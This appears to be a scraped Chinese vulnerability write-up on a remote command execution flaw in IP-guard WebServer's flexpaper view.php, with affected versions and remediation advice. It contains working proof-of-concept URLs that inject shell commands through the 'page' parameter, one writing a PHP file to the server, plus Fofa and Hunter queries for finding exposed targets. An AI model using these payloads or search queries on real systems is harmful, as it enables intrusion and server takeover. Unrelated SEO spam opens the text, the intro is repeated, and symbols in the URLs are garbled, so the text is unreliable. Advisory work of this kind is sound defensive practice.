珠海网站建设 旭洁,你知道吗 网站,简单的html网页,wordpress relocate文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件#xff0c;旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏… 文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏洞RCE的问题是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper使用的这个插件版本存在远程命令执行漏洞新版本已不再使用 flexpaper。 二、影响版本
受影响的范围即有使用文件预览功能的web系统
溢信科技 IP-guard4.81.0307.0三、资产测绘
Fofa语法
appIP-guard
Hunter语法
web.titleIP-guard四、漏洞复现
1、来到web访问界面
2、bp抓包修改数据包 poc:
/ipg/static/appr/lib/flexpaper/php/view.php?doc1.jpgformatswfisSplittruepage%7C%7Cecho^%3C?phpphpinfo();?^%3E%3Esany.php
/ipg/static/appr/lib/flexpaper/php/view.php?doc11.jpgformatswfisSplittruepage||echo123456test.txt/ipg/static/appr/lib/flexpaper/php/test.txt可执行写入的命令可造成重大危害。 五、修复建议
临时防护方案
1.加强系统和网络的访问控制修改防火墙策略不将非必要服务暴露于公网
2.在公网部署的系统通过WAF限制外网对/ipg/static/appr/lib/flexpaper/php/view.php路径的访问
3.定期对服务器上的网站后门文件进行及时查杀。正式防护方案
官方已修复该漏洞建议用户更新到安全版本。
安全版本:
IP-guard WebServer 4.81.0307.0
下载链接
https://www.ip-guard.net/
